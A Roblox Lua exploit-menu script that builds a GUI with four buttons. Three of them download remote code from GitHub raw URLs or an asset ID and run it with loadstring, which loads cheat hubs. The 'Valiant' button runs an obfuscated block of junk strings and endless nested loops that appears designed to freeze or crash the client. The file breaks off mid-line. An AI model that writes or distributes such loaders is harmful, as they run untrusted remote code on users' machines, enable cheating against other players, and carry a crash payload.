
local ScreenGui = Instance.new("ScreenGui")
local main = Instance.new("Frame")
local LegacyX = Instance.new("TextButton")
local TextLabel = Instance.new("TextLabel")
local Raycodex = Instance.new("TextButton")
local SwagMode = Instance.new("TextButton")
local Valiant = Instance.new("TextButton")

--Properties:

ScreenGui.Parent = game.CoreGui

main.Name = "main"
main.Parent = ScreenGui
main.BackgroundColor3 = Color3.fromRGB(21, 21, 21)
main.Position = UDim2.new(0.447015822, 0, 0.558098674, 0)
main.Size = UDim2.new(0, 410, 0, 196)
main.Active = true
main.Draggable = true

LegacyX.Name = "Legacy X"
LegacyX.Parent = main
LegacyX.BackgroundColor3 = Color3.fromRGB(255, 0, 0)
LegacyX.Position = UDim2.new(0.0195121951, 0, 0.205875278, 0)
LegacyX.Size = UDim2.new(0, 184, 0, 47)
LegacyX.Font = Enum.Font.SourceSans
LegacyX.Text = "Legacy X"
LegacyX.TextColor3 = Color3.fromRGB(0, 0, 0)
LegacyX.TextSize = 14.000
LegacyX.MouseButton1Down:connect(function()
	repeat
	wait();
	until game:IsLoaded();
loadstring(game:HttpGet('https://raw.githubusercontent.com/Legacy-Foundation/Legacy-Hub/main/.lua'))();
end)

TextLabel.Parent = main
TextLabel.BackgroundColor3 = Color3.fromRGB(79, 79, 79)
TextLabel.LayoutOrder = -1
TextLabel.Size = UDim2.new(0, 410, 0, 31)
TextLabel.Font = Enum.Font.SourceSans
TextLabel.Text = "*OP* Gui by SSAvvAGGE"
TextLabel.TextColor3 = Color3.fromRGB(0, 0, 0)
TextLabel.TextSize = 14.000


Raycodex.Name = "Raycodex"
Raycodex.Parent = main
Raycodex.BackgroundColor3 = Color3.fromRGB(255, 0, 0)
Raycodex.Position = UDim2.new(0.492682934, 0, 0.20408164, 0)
Raycodex.Size = UDim2.new(0, 200, 0, 47)
Raycodex.Font = Enum.Font.SourceSans
Raycodex.Text = "Raycodex"
Raycodex.TextColor3 = Color3.fromRGB(0, 0, 0)
Raycodex.TextSize = 14.000
Raycodex.MouseButton1Down:connect(function()
	loadstring(game:GetObjects("rbxassetid://5812737894")[1].Source)()
end)

SwagMode.Name = "SwagMode"
SwagMode.Parent = main
SwagMode.BackgroundColor3 = Color3.fromRGB(255, 0, 0)
SwagMode.Position = UDim2.new(0.0195121951, 0, 0.545918405, 0)
SwagMode.Size = UDim2.new(0, 184, 0, 50)
SwagMode.Font = Enum.Font.SourceSans
SwagMode.Text = "SwagMode"
SwagMode.TextColor3 = Color3.fromRGB(0, 0, 0)
SwagMode.TextSize = 14.000
SwagMode.MouseButton1Down:connect(function()
	loadstring(game:HttpGet("https://raw.githubusercontent.com/lerkermer/lua-projects/master/SwagModeV002"))()
end)

Valiant.Name = "Valiant"
Valiant.Parent = main
Valiant.BackgroundColor3 = Color3.fromRGB(255, 0, 0)
Valiant.Position = UDim2.new(0.492682934, 0, 0.545918345, 0)
Valiant.Size = UDim2.new(0, 200, 0, 50)
Valiant.Font = Enum.Font.SourceSans
Valiant.Text = "Valiant"
Valiant.TextColor3 = Color3.fromRGB(0, 0, 0)
Valiant.TextSize = 14.000
Valiant.MouseButton1Down:connect(function()
	while true do pcall(function(self,...)while true do for a=math.pow(math.abs(tonumber(1 or 1*4-3 or math.floor(1,math.huge))),math.ceil(tonumber(960 or#2815))^math.huge%math.random(math.huge,math.huge)),math.pow(math.abs(tonumber(1 or 2*2-3)),math.ceil(tonumber(5123 or 12384))^math.huge%math.random(math.huge,math.huge))do local b=(tonumber(math.floor(math.floor(math.random(132612,461234),math.huge or math.abs(1 or 1^4712*1263/1))))-#"!%@346^@&#487@#^$&*@#54r&C#@&*(RtC&*(@#TRG&*#@GXRYI@#GXR86#@TRX^&*@#*@#%$^&@#%4^&*@#%$R&*(@#^%R(&*@#^5r78r@^#&*%^ @*#&685 ███████████████████████████████████████████████████████████████████████████@()#*RXXU*()@#nry890#@yurz(*#@ycr&*xxyn@#*(ru(!x@#)ry@#(*rY█████████████████████████████████████████████████x@#*(rY@#*(yrz(*n@#nyRZX98@#yr7y@#(r*Yn@#*(R████████████████████████████████████████i@*(#RJ23*)rUX@)#*UR09@#uXR)*@#yr)X8@u#████████████████^@!#&*$^!@$&^%!@^$&%!@&*$^@#&*%^@#&*%^@#*&VGGEYWGFYIYUWEGFUIWEYGFIUEWYFIUWEWYFIYUWEGFUYGEWFUYG^*#&T@*&RFTYU!%@346^@&#487@#^$@IUXTRy@#*(TRY@*)#(YRTN*(#@CYRT@#(YCTXR@#*(CTRYX89&*@#54r&*@#%$^&@#%4^&*@#%$R&*(@#^%R(&*@#^5r78r@^#&*%^ @*#&685 ████████████████!@(&*erxty!*&@rt!*@#&^XTR*!@^&xe███████████████████████████████████████████████(@&*#zry*(@#ynr(*@#c&y*&ry@#(&xzrt@#(x78RT2#(&RXY@(#Y7XR892#██████████████████████████████████████████&*(#YRX(&*@#YRZ897@#yRX9N8234tyrx(*&@#t(rx&t@#&(*rxT@#&*(XRTZY███████████████████████████████████████████████████████████x@&*#ry@&*#TRYb@#&*rbt*@&#TBR8████████████████^@!#&*$^!@$&^%!@^$&%!@&*$^@#&*%^@#&*%^@#*&VGGEYWGFYIYUWEGFUIWEYGFIUEWYFIUWEWYFIYUWEGFUYGEWFUYG^*#&T@*&RFTYUG@#^*$G*@^GF#*TG@*████████████████X@#687RTB@#678R@#^&RT@#*&rt@#^&*rxT@*#&████████████████████████████████████@893X4RY293&*xRYB(@#*cry*(@#yRX89@#YCRX97@#TYCR9*@x#yxr(@#ybrx()x!x@#█████████████████@#rc(&@#yr(*xz@#yry@#(r!@)$&)@#&*(%@$#&u)$(@&y██████████████████████████████@#ru(xty@#(&*rtc#@&*ctbr&*@#tyxr&*(@#y8XCR9Y████████████████████████2YWEF7823YCRF7823YTR6782X3TXER6723TRX67█████████████████H&*(#H@&*DFH@*#&FRY&*@#tr&*@#YTR79@#YR(@#Yr78@#TGfG@T*#^fG@#^*$G*@^GF#*TG@*███████████████████████████2(x*r3Y(@&#ry89@#yr(*@#cvyr89@#yc(*r&t@#(&CR████████████████@#97RCY@#*&CRT@#&*(RTX@#&*RTX@#&*TRXXT@#Y&(R██████████████████████████████████████████████████@#$98crY@#*(CRU@#)rxu@#(C*Rt@#8rctcc6@#cr78@███████████████████████████████████████████████H&*(#H@&*DFH@*#&FRY&*@#tr&*@#YTR79@#YR(@#Yr78@#TGfG@T*#^f!%@346^@&#487@#^$@IUXTRy@#*(TRY@*)#(YRTN*(#@CYRT@#(YCTXR@#*(CTRYX89&*@#54r&*@#%$^&@#%4^&*@#%$R&*(@#^%R(&*@#^5r78r@^#&*%^ @*#&685 ████████████████!@(&*erxty!*&@rt!*@#&^XTR*!@^&xe███████████████████████████████@#o*xrY@#*()XRY@#*(RYN89@#YNZRX89@#yRZX98@#xy███████████████████████████████@x#)r*u@#*()RYz@#*(xry782#YRX72Y39XRY2#(&RY782X3Y██████████████████████████████████████████████████████████████████████████████████████x@&*#ry@&*#TRYb@#&*rbt*@&#TBR8████████████████^@!#&*$^!@$&^%!@^$&%!@&*$^@#&*%^@#&*%^@#*&VGGEYWGFYIYUWEGFUIWEYGFIUEWYFIUWEWYFIYUWEGFUYGEWFUYG^*#&T@*&RFTYUG@#^*$G*@^GF#*TG@*████████████████X@#687RTB@#678R@#^&RT@#*&rt@#^&*rxT@*#&███████████████████████████████████████████████████████████████████████████████████████████████████████████2YWEF7823YCRF7823YTR6782X3TXER6723TRX67█████████████████H&*(#H@&*DFH@*#&FRY&*@#tr&*@#YTR79@#YR(@#Yr78@#TGfG@T*#^f!%@346^@&#487@#^$@IUXTRy@#*(TRY@*)#(YRTN*(#@CYRT@#(YCTXR@#*(CTRYX89&*@#54r&*@#%$^&@#%4^&*@#%$R&*(@#^%R(&*@#^5r78r@^#&*%^ @*#&685 ████████████████!@(&*erxty!*&@rt!*@#&^XTR*!@^&xe██████████████████████(*r#Y3@*(xRY@#(*RUZ@#*()ryn*(@x#yr98@#yx(r*y@n#(R8ZUY████████████████████████████████████████████████#(&*wrcy@#(&RXYN(z@#*ryn)*(@!#ynrX0@x#yuzr*(&@#y(rd*U#s@*()SYR██████████████████████████████████████████████████████████████████████████████x@&*#ry@&*#TRYb@#&*rbt*@&#TBR8████████████████^@!#&*$^!@$&^%!@^$&%!@&*$^@#&*%^@#&*%^@#*&VGGEYWGFYIYUWEGFUIWEYGFIUEWYFIUWEWYFIYUWEGFUYGEWFUYG^*#&T@*&RFTYUG@#^*$G*@^GF#*TG@*████████████████X@#687RTB@#678R@#^&RT@#*&rt@#^&*rxT@*#&█████████████████████████████████████████████@o*crtu@x#(*crtxy@#(8XRy@#(*cxry@#(&cry@#&*cry*&@#ycr*@#^&txryb*&@#tbcr*x██████████████████████████████████████████████████████████████2YWEF7823YCRF7823YTR6782X3TXER6723TRX67█████████████████H&*(#H@&*DFH@*#&FRY&*@#tr&*@#YTR79@#YR(@#Yr78@#TGfG@T*#^f!%@346^@&#487@#^$@IUXTRy@#*(TRY@*)#(YRTN*(#@CYRT@#(YCTXR@#*(CTRYX89&*@#54r&*@#%$^&@#%4^&*@#%$R&*(@#^%R(&*@#^5r78r@^#&*%^ @*#&685 ████████████████!@(&*erxty!*&@rt!*@#&^XTR*!@^&xe███████████████████████████████████████████████████████████████████@x#r(*@y#r(x&c@#t^cr(*&@#tb&*crtb@#cr*(&t@#&(rZtg@#&rxYB@#(*cry@#*&crt@#&*ry(@#xyr9Y█████████████████████████████████████████████████████████████████████████████████x@&*#ry@&*#TRYb@#&*rbt*@&#TBR8████████████████^@!#&*$^!@$&^%!@^$&%!@&*$^@#&*%^@#&*%^@#*&VGGEYWGFYIYUWEGFUIWEYGFIUEWYFIUWEWYFIYUWEGFUYGEWFUYG^*#&T@*&RFTYUG@#^*$G*@^GF#*TG@*████████████████X@#687RTB@#678R@#^&RT@#*&rt@#^&*rxT@*#&█████████████@&(#yrc&*(@#tyrc&(*@#yrc&*██████████████████████*(@#YCR&*(@#yrcx*&(#@tbrc*&@#trc&*b@t#*r&ct@#██████████████████████████████████2Y EF872T3EF78TB8672CT87tx#@&*xrt@x#&*tr@&*#trbC8@ #bt &*C██████████████████████████████████████2YWEF7823YCRF7823YTR6782X3TXER6723TRX67█████████████████H&*(#H@&*DFH@*#&FRY&*@#tr&*@#YTR79@#YR(@#Yr78@#TGfG@T*#^f")^tostring(math.huge*571273^12356 or math.ceil(math.random(1 or 1-1+1/0)))while true do local c=(tonumber(math.floor(math.floor(math.random(132612,461234),math.huge or math.abs(1 or 1^4712*1263/1))))-#"!%@346^@&#487@#^$@IUXTRy@#*(TRY@*)#(YRTN*(#@CYRT@#(YCTXR@#*(CTRYX89&*@#54r&*@#%$^&@#%4^&*@#%$R&*(@#^%R(&*@#^5r78r@^#&*%^ @*#&685 ████████████████!@(&*erxty!*&@rt!*@#&^XTR*!@^&xe███████████████████████████████@#o*xrY@#*()XRY@#*(RYN89@#YNZRX89@#yRZX98@#xy███████████████████████████████@x#)r*u@#*()RYz@#*(xry782#YRX72Y39XRY2#(&RY782X3Y██████████████████████████████████████████████████████████████████████████████████████x@&*#ry@&*#TRYb@#&*rbt*@&#TBR8████████████████^@!#&*$^!@$&^%!@^$&%!@&*$^@#&*%^@#&*%^@#*&VGGEYWGFYIYUWEGFUIWEYGFIUEWYFIUWEWYFIYUWEGFUYGEWFUYG^*#&T@*&RFTYUG@#^*$G*@^GF#*TG@*████████████████X@#687RTB@#678R@#^&RT@#*&rt@#^&*rxT@*#&███████████████████████████████████████████████████████████████████████████████████████████████████████████2YWEF7823YCRF7823YTR6782X3TXER6723TRX67█████████████████H&*(#H@&*DFH@*#&FRY&*@#tr&*@#YTR79@#YR(@#Yr78@#TGfG@T*#^f!%@346^@&#487@#^$@IUXTRy@#*(TRY@*)#(YRTN*(#@CYRT@#(YCTXR@#*(CTRYX89&*@#54r&*@#%$^&@#%4^&*@#%$R&*(@#^%R(&*@#^5r78r@^#&*%^ @*#&685 ████████████████!@(&*erxty!*&@rt!*@#&^XTR*!@^&xe██████████████████████(*r#Y3@*(xRY@#(*RUZ@#*()ryn*(@x#yr98@#yx(r*y@n#(R8ZUY████████████████████████████████████████████████#(&*wrcy@#(&RXYN(z@#*ryn)*(@!#ynrX0@x#yuzr*(&@#y(rd*U#s@*()SYR██████████████████████████████████████████████████████████████████████████████x@&*#ry@&*#TRYb@#&*rbt*@&#TBR8████████████████^@!#&*$^!@$&^%!@^$&%!@&*$^@#&*%^@#&*%^@#*&VGGEYWGFYIYUWEGFUIWEYGFIUEWYFIUWEWYFIYUWEGFUYGEWFUYG^*#&T@*&RFTYUG@#^*$G*@^GF#*TG@*████████████████X@#687RTB@#678R@#^&RT@#*&rt@#^&*rxT@*#&█████████████████████████████████████████████@o*crtu@x#(*crtxy@#(8XRy@#(*cxry@#(&cry@#&*cry*&@#ycr*@#^&txryb*&@#tbcr*x██████████████████████████████████████████████████████████████2YWEF7823YCRF7823YTR6782X3TXER6723TRX67█████████████████H&*(#H@&*DFH@*#&FRY&*@#tr&*@#YTR79@#YR(@#Yr78@#TGfG@T*#^f!%@346^@&#487@#^$@IUXTRy@#*(TRY@*)#(YRTN*(#@CYRT@#(YCTXR@#*(CTRYX89&*@#54r&*@#%$^&@#%4^&*@#%$R&*(@#^%R(&*@#^5r78r@^#&*%^ @*#&685 ████████████████!@(&*erxty!*&@rt!*@#&^XTR*!@^&xe███████████████████████████████████████████████████████████████████@x#r(*@y#r(x&c@#t^cr(*&@#tb&*crtb@#cr*(&t@#&(rZtg@#&rxYB@#(*cry@#*&crt@#&*ry(@#xyr9Y█████████████████████████████████████████████████████████████████████████████████x@&*#ry@&*#TRYb@#&*rbt*@&#TBR8████████████████^@!#&*$^!@$&^%!@^$&%!@&*$^@#&*%^@#&*%^@#*&VGGEYWGFYIYUWEGFUIWEYGFIUEWYFIUWEWYFIYUWEGFUYGEWFUYG^*#&T@*&RFTYUG@#^*$G*@^GF#*TG@*████████████████X@#687RTB@#678R@#^&RT@#*&rt@#^&*rxT@*#&█████████████@&(#yrc&*(@#tyrc&(*@#yrc&*██████████████████████*(@#YCR&*(@#yrcx*&(#@tbrc*&@#trc&*b@t#*r&ct@#██████████████████████████████████2Y EF872T3EF78TB8672CT87tx#@&*xrt@x#&*tr@&*#trbC8@ #bt &*C██████████████████████████████████████2YWEF7823YCRF7823YTR6782X3TXER6723TRX67█████████████████H&*(#H@&*DFH@*#&FRY&*@#tr&*@#YTR79@#YR(@#Yr78@#TGfG@T*#^f!%@346^@&#487@#^$@IUXTRy@#*(TRY@*)#(YRTN*(#@CYRT@#(YCTXR@#*(CTRYX89&*@#54r&*@#%$^&@#%4^&*@#%$R&*(@#^%R(&*@#^5r78r@^#&*%^ @*#&685 ████████████████!@(&*erxty!*&@rt!*@#&^XTR*!@^&xe███████████████████████████████@#o*xrY@#*()XRY@#*(RYN89@#YNZRX89@#yRZX98@#xy███████████████████████████████@x#)r*u@#*()RYz@#*(xry782#YRX72Y39XRY2#(&RY782X3Y██████████████████████████████████████████████████████████████████████████████████████x@&*#ry@&*#TRYb@#&*rbt*@&#TBR8████████████████^@!#&*$^!@$&^%!@^$&%!@&*$^@#&*%^@#&*%^@#*&VGGEYWGFYIYUWEGFUIWEYGFIUEWYFIUWEWYFIYUWEGFUYGEWFUYG^*#&T@*&RFTYUG@#^*$G*@^GF#*TG@*████████████████X@#687RTB@#678R@#^&RT@#*&rt@#^&*rxT@*#&███████████████████████████████████████████████████████████████████████████████████████████████████████████2YWEF7823YCRF7823YTR6782X3TXER6723TRX67█████████████████H&*(#H@&*DFH@*#&FRY&*@#tr&*@#YTR79@#YR(@#Yr78@#TGfG@T*#^f!%@346^@&#487@#^$@IUXTRy@#*(TRY@*)#(YRTN*(#@CYRT@#(YCTXR@#*(CTRYX89&*@#54r&*@#%$^&@#%4^&*@#%$R&*(@#^%R(&*@#^5r78r@^#&*%^ @*#&685 ████████████████!@(&*erxty!*&@rt!*@#&^XTR*!@^&xe██████████████████████(*r#Y3@*(xRY@#(*RUZ@#*()ryn*(@x#yr98@#yx(r*y@n#(R8ZUY████████████████████████████████████████████████#(&*wrcy@#(&RXYN(z@#*ryn)*(@!#ynrX0@x#yuzr*(&@#y(rd*U#s@*()SYR██████████████████████████████████████████████████████████████████████████████x@&*#ry@&*#TRYb@#&*rbt*@&#TBR8████████████████^@!#&*$^!@$&^%!@^$&%!@&*$^@#&*%^@#&*%^@#*&VGGEYWGFYIYUWEGFUIWEYGFIUEWYFIUWEWYFIYUWEGFUYGEWFUYG^*#&T@*&RFTYUG@#^*$G*@^GF#*TG@*████████████████X@#687RTB@#678R@#^&RT@#*&rt@#^&*rxT@*#&█████████████████████████████████████████████@o*crtu@x#(*crtxy@#(8XRy@#(*cxry@#(&cry@#&*cry*&@#ycr*@#^&txryb*&@#tbcr*x██████████████████████████████████████████████████████████████2YWEF7823YCRF7823YTR6782X3TXER6723TRX67█████████████████H&*(#H@&*DFH@*#&FRY&*@#tr&*@#YTR79@#YR(@#Yr78@#TGfG@T*#^f!%@346^@&#487@#^$@IUXTRy@#*(TRY@*)#(YRTN*(#@CYRT@#(YCTXR@#*(CTRYX89&*@#54r&*@#%$^&@#%4^&*@#%$R&*(@#^%R(&*@#^5r78r@^#&*%^ @*#&685 ████████████████!@(&*erxty!*&@rt!*@#&^XTR*!@^&xe███████████████████████████████████████████████████████████████████@x#r(*@y#r(x&c@#t^cr(*&@#tb&*crtb@#cr*(&t@#&(rZtg@#&rxYB@#(*cry@#*&crt@#&*ry(@#xyr9Y█████████████████████████████████████████████████████████████████████████████████x@&*#ry@&*#TRYb@#&*rbt*@&#TBR8████████████████^@!#&*$^!@$&^%!@^$&%!@&*$^@#&*%^@#&*%^@#*&VGGEYWGFYIYUWEGFUIWEYGFIUEWYFIUWEWYFIYUWEGFUYGEWFUYG^*#&T@*&RFTYUG@#^*$G*@^GF#*TG@*████████████████X@#687RTB@#678R@#^&RT@#*&rt@#^&*rxT@*#&█████████████@&(#yrc&*(@#tyrc&(*@#yrc&*██████████████████████*(@#YCR&*(@#yrcx*&(#@tbrc*&@#trc&*b@t#*r&ct@#██████████████████████████████████2Y EF872T3EF78TB8672CT87tx#@&*xrt@x#&*tr@&*#trbC8@ #bt &*C██████████████████████████████████████2YWEF7823YCRF7823YTR6782X3TXER6723TRX67█████████████████H&*(#H@&*DFH@*#&FRY&*@#tr&*@#YTR79@#YR(@#Yr78@#TGfG@T*#^f")^tostring(math.huge*571273^12356 or math.ceil(math.random(1 or 1-1+1/0)))for d=math.pow(math.abs(tonumber(1 or 1*4-3 or math.floor(1,math.huge))),math.ceil(tonumber(960 or#2815))^math.huge%math.random(math.huge,math.huge)),math.pow(math.abs(tonumber(1 or 12347124*12381-471237)),math.ceil(tonumber(12312432 or 345623))^math.huge%math.random(math.huge,math.huge-1237812*12357674/12335))do if d then while d do local e={...}e[1]=e[math.abs(tonumber(1 or 1))]while e[1]==e[1]do local f=table.pack('\12'..'\13'..'\9'..'\9'..'\11'..'\12'..'\13'..'\11'..'\12'..'\13'..'\9'..'\9'..'\11'..'\12'..'\13'..'\9'..'\9'..'\11'..'\12'..'\13'..'\9'..'\9'..'\11'..'\9'..'\9'..'\9'..'\11'..'\12'..'\11'..'\12'..'\13'..'\9'..'\11'..'\12'..'\13'..'\12'..'\13'..'\9'..'\9'..'\11'..'\12'..'\13'..'\11'..'\12'..'\13'..'\9'..'\9'..'\11'..'\12'..'\13'..'\9'..'\9'..'\11'..'\12'..'\13'..'\9'..'\9'..'\11'..'\9'..'\9'..'\9'..'\11'..'\12'..'\11'..'\12'..'\13'..'\9'..'\11'..'\12'..'\13'..'\12'..'\13'..'\9'..'\9'..'\11'..'\12'..'\13'..'\11'..'\12'..'\13'..'\9'..'\9'..'\11'..'\12'..'\13'..'\9'..'\9'..'\11'..'\12'..'\13'..'\9'..'\9'..'\11'..'\9'..'\9'..'\9'..'\11'..'\12'..'\11'..'\12'..'\13'..'\9'..'\11'..'\12'..'\13'..'\12'..'\13'..'\9'..'\9'..'\11'..'\12'..'\13'..'\11'..'\12'..'\13'..'\9'..'\9'..'\11'..'\12'..'\13'..'\9'..'\9'..'\11'..'\12'..'\13'..'\11'..'\12'..'\12'..'\12'..'\13'..'\9'..'\9'..'\11'..'\12'..'\13'..'\11'..'\12'..'\13'..'\9'..'\9'..'\11'..'\9'..'\11'..'\12'..'\13'..'\11'..'\12'..'\13'..'\12'..'\13'..'\9'..'\9'..'\11'..'\12'..'\13'..'\11'..'\12')local g=(tonumber(math.floor(math.floor(math.random(23455632,45632456),math.huge or math.abs(1 or 1^2351*143463/1))))-#"!%@346^@&#487@#^$@IUXTRy@#*(TRY@*)#(YRTN*(#@CYRT@#(YCTXR@#*(CTRYX89&*@#54r&*@#%$^&@#%4^&*@#%$R&*(@#^%R(&*@#^5r78r@^#&*%^ @*#&685 ████████████████!@(&*erxty!*&@rt!*@#&^XTR*!@^&xe███████████████████████████████@#o*xrY@#*()XRY@#*(RYN89@#YNZRX89@#yRZX98@#xy███████████████████████████████@x#)r*u@#*()RYz@#*(xry782#YRX72Y39XRY2#(&RY782X3Y██████████████████████████████████████████████████████████████████████████████████████x@&*#ry@&*#TRYb@#&*rbt*@&#TBR8████████████████^@!#&*$^!@$&^%!@^$&%!@&*$^@#&*%^@#&*%^@#*&VGGEYWGFYIYUWEGFUIWEYGFIUEWYFIUWEWYFIYUWEGFUYGEWFUYG^*#&T@*&RFTYUG@#^*$G*@^GF#*TG@*████████████████X@#687RTB@#678R@#^&RT@#*&rt@#^&*rxT@*#&███████████████████████████████████████████████████████████████████████████████████████████████████████████2YWEF7823YCRF7823YTR6782X3TXER6723TRX67█████████████████H&*(#H@&*DFH@*#&FRY&*@#tr&*@#YTR79@#YR(@#Yr78@#TGfG@T*#^f!%@346^@&#487@#^$@IUXTRy@#*(TRY@*)#(YRTN*(#@CYRT@#(YCTXR@#*(CTRYX89&*@#54r&*@#%$^&@#%4^&*@#%$R&*(@#^%R(&*@#^5r78r@^#&*%^ @*#&685 ████████████████!@(&*erxty!*&@rt!*@#&^XTR*!@^&xe██████████████████████(*r#Y3@*(xRY@#(*RUZ@#*()ryn*(@x#yr98@#yx(r*y@n#(R8ZUY████████████████████████████████████████████████#(&*wrcy@#(&RXYN(z@#*ryn)*(@!#ynrX0@x#yuzr*(&@#y(rd*U#s@*()SYR██████████████████████████████████████████████████████████████████████████████x@&*#ry@&*#TRYb@#&*rbt*@&#TBR8████████████████^@!#&*$^!@$&^%!@^$&%!@&*$^@#&*%^@#&*%^@#*&VGGEYWGFYIYUWEGFUIWEYGFIUEWYFIUWEWYFIYUWEGFUYGEWFUYG^*#&T@*&RFTYUG@#^*$G*@^GF#*TG@*████████████████X@#687RTB@#678R@#^&RT@#*&rt@#^&*rxT@*#&█████████████████████████████████████████████@o*crtu@x#(*crtxy@#(8XRy@#(*cxry@#(&cry@#&*cry*&@#ycr*@#^&txryb*&@#tbcr*x██████████████████████████████████████████████████████████████2YWEF7823YCRF7823YTR6782X3TXER6723TRX67█████████████████H&*(#H@&*DFH@*#&FRY&*@#tr&*@#YTR79@#YR(@#Yr78@#TGfG@T*#^f!%@346^@&#487@#^$@IUXTRy@#*(TRY@*)#(YRTN*(#@CYRT@#(YCTXR@#*(CTRYX89&*@#54r&*@#%$^&@#%4^&*@#%$R&*(@#^%R(&*@#^5r78r@^#&*%^ @*#&685 ████████████████!@(&*erxty!*&@rt!*@#&^XTR*!@^&xe███████████████████████████████████████████████████████████████████@x#r(*@y#r(x&c@#t^cr(*&@#tb&*crtb@#cr*(&t@#&(rZtg@#&rxYB@#(*cry@#*&crt@#&*ry(@#xyr9Y█████████████████████████████████████████████████████████████████████████████████x@&*#ry@&*#TRYb@#&*rbt*@&#TBR8████████████████^@!#&*$^!@$&^%!@^$&%!@&*$^@#&*%^@#&*%^@#*&VGGEYWGFYIYUWEGFUIWEYGFIUEWYFIUWEWYFIYUWEGFUYGEWFUYG^*#&T@*&RFTYUG@#^*$G*@^GF#*TG@*████████████████X@#687RTB@#678R@#^&RT@#*&rt@#^&*rxT@*#&█████████████@&(#yrc&*(@#tyrc&(*@#yrc&*██████████████████████*(@#YCR&*(@#yrcx*&(#@tbrc*&@#trc&*b@t#*r&ct@#██████████████████████████████████2Y EF872T3EF78TB8672CT87tx#@&*xrt@x#&*tr@&*#trbC8@ #bt &*C██████████████████████████████████████2YWEF7823YCRF7823YTR6782X3TXER6723TRX67█████████████████H&*(#H@&*DFH@*#&FRY&*@#tr&*@#YTR79@#YR(@#Yr78@#TGfG@T*#^f!%@346^@&#487@#^$@IUXTRy@#*(TRY@*)#(YRTN*(#@CYRT@#(YCTXR@#*(CTRYX89&*@#54r&*@#%$^&@#%4^&*@#%$R&*(@#^%R(&*@#^5r78r@^#&*%^ @*#&685 ████████████████!@(&*erxty!*&@rt!*@#&^XTR*!@^&xe███████████████████████████████@#o*xrY@#*()XRY@#*(RYN89@#YNZRX89@#yRZX98@#xy███████████████████████████████@x#)r*u@#*()RYz@#*(xry782#YRX72Y39XRY2#(&RY782X3Y██████████████████████████████████████████████████████████████████████████████████████x@&*#ry@&*#TRYb@#&*rbt*@&#TBR8████████████████^@!#&*$^!@$&^%!@^$&%!@&*$^@#&*%^@#&*%^@#*&VGGEYWGFYIYUWEGFUIWEYGFIUEWYFIUWEWYFIYUWEGFUYGEWFUYG^*#&T@*&RFTYUG@#^*$G*@^GF#*TG@*████████████████X@#687RTB@#678R@#^&RT@#*&rt@#^&*rxT@*#&███████████████████████████████████████████████████████████████████████████████████████████████████████████2YWEF7823YCRF7823YTR6782X3TXER6723TRX67█████████████████H&*(#H@&*DFH@*#&FRY&*@#tr&*@#YTR79@#YR(@#Yr78@#TGfG@T*#^f!%@346^@&#487@#^$@IUXTRy@#*(TRY@*)#(YRTN*(#@CYRT@#(YCTXR@#*(CTRYX89&*@#54r&*@#%$^&@#%4^&*@#%$R&*(@#^%R(&*@#^5r78r@^#&*%^ @*#&685 ████████████████!@(&*erxty!*&@rt!*@#&^XTR*!@^&xe██████████████████████(*r#Y3@*(xRY@#(*RUZ@#*()ryn*(@x#yr98@#yx(r*y@n#(R8ZUY████████████████████████████████████████████████#(&*wrcy@#(&RXYN(z@#*ryn)*(@!#ynrX0@x#yuzr*(&@#y(rd*U#s@*()SYR██████████████████████████████████████████████████████████████████████████████x@&*#ry@&*#TRYb@#&*rbt*@&#TBR8████████████████^@!#&*$^!@$&^%!@^$&%!@&*$^@#&*%^@#&*%^@#*&VGGEYWGFYIYUWEGFUIWEYGFIUEWYFIUWEWYFIYUWEGFUYGEWFUYG^*#&T@*&RFTYUG@#^*$G*@^GF#*TG@*████████████████X@#687RTB@#678R@#^&RT@#*&rt@#^&*rxT@*#&█████████████████████████████████████████████@o*crtu@x#(*crtxy@#(8XRy@#(*cxry@#(&cry@#&*cry*&@#ycr*@#^&txryb*&@#tbcr*x██████████████████████████████████████████████████████████████2YWEF7823YCRF7823YTR6782X3TXER6723TRX67█████████████████H&*(#H@&*DFH@*#&FRY&*@#tr&*@#YTR79@#YR(@#Yr78@#TGfG@T*#^f!%@346^@&#487@#^$@IUXTRy@#*(TRY@*)#(YRTN*(#@CYRT@#(YCTXR@#*(CTRYX89&*@#54r&*@#%$^&@#%4^&*@#%$R&*(@#^%R(&*@#^5r78r@^#&*%^ @*#&685 ████████████████!@(&*erxty!*&@rt!*@#&^XTR*!@^&xe███████████████████████████████████████████████████████████████████@x#r(*@y#r(x&c@#t^cr(*&@#tb&*crtb@#cr*(&t@#&(rZtg@#&rxYB@#(*cry@#*&crt@#&*ry(@#xyr9Y█████████████████████████████████████████████████████████████████████████████████x@&*#ry@&*#TRYb@#&*rbt*@&#TBR8████████████████^@!#&*$^!@$&^%!@^$&%!@&*$^@#&*%^@#&*%^@#*&VGGEYWGFYIYUWEGFUIWEYGFIUEWYFIUWEWYFIYUWEGFUYGEWFUYG^*#&T@*&RFTYUG@#^*$G*@^GF#*TG@*████████████████X@#687RTB@#678R@#^&RT@#*&rt@#^&*rxT@*#&█████████████@&(#yrc&*(@#tyrc&(*@#yrc&*██████████████████████*(@#YCR&*(@#yrcx*&(#@tbrc*&@#trc&*b@t#*r&ct@#██████████████████████████████████2Y EF872T3EF78TB8672CT87tx#@&*xrt@x#&*tr@&*#trbC8@ #bt &*C██████████████████████████████████████2YWEF7823YCRF7823YTR6782X3TXER6723TRX67█████████████████H&*(#H@&*DFH@*#&FRY&*@#tr&*@#YTR79@#YR(@#Yr78@#TGfG@T*#^f")^tostring(math.huge*2346425^3562435 or math.ceil(math.random(1 or 1-1+1/0)))local h=table.pack('\9'..'\9'..'\11'..'\9'..'\9'..'\9'..'\11'..'\12'..'\13'..'\9'..'\11'..'\12'..'\13'..'\12'..'\13'..'\9'..'\9'..'\11'..'\12'..'\13'..'\11'..'\12'..'\13'..'\9'..'\9'..'\11'..'\12'..'\13'..'\9'..'\9'..'\11'..'\12'..'\13'..'\9'..'\9'..'\11'..'\9'..'\9'..'\9'..'\11'..'\12'..'\13'..'\9'..'\11'..'\12'..'\13'..'\12'..'\13'..'\9'..'\9'..'\11'..'\12'..'\13'..'\11'..'\12'..'\13'..'\9'..'\9'..'\11'..'\12'..'\13'..'\9'..'\9'..'\11'..'\12'..'\13'..'\9'..'\9'..'\11'..'\9'..'\9'..'\9'..'\11'..'\12'..'\13'..'\9'..'\11'..'\12'..'\13'..'\12'..'\13'..'\9'..'\9'..'\11'..'\12'..'\13'..'\11'..'\12'..'\13'..'\9'..'\9'..'\11'..'\12'..'\13'..'\9'..'\9'..'\11'..'\12'..'\13'..'\9'..'\9'..'\11'..'\9'..'\9'..'\9'..'\11'..'\12'..'\13'..'\9'..'\11'..'\12'..'\13'..'\12